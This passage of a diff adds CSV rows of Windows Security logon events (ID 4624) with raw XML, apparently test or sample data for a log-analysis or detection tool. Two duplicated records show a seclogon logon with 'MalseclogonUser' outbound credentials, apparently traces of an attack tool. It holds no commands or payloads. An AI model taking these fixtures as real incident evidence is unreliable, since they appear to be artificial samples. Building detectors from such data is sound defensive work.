+</Event>"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:25.097874Z"">
+    </TimeCreated>
+    <EventRecordID>2988550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x568d99</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64229</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.920903Z"">
+    </TimeCreated>
+    <EventRecordID>2988547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56874b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64227</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.906195Z"">
+    </TimeCreated>
+    <EventRecordID>2988544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x5686d9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64226</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.521162Z"">
+    </TimeCreated>
+    <EventRecordID>2988535</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567758</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.450493Z"">
+    </TimeCreated>
+    <EventRecordID>2988529</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567515</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50251</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.725408Z"">
+    </TimeCreated>
+    <EventRecordID>2988525</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56738f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64223</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.637236Z"">
+    </TimeCreated>
+    <EventRecordID>2988522</EventRecordID>
+    <Correlation ActivityID=""2654C2A7-231C-0002-BAC2-54261C23D801"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-84104</Data>
+    <Data Name=""TargetUserName"">02694W-WIN10$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x567343</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">429CA5A3-EDFC-5657-17C3-C050C7B047F4</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50250</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
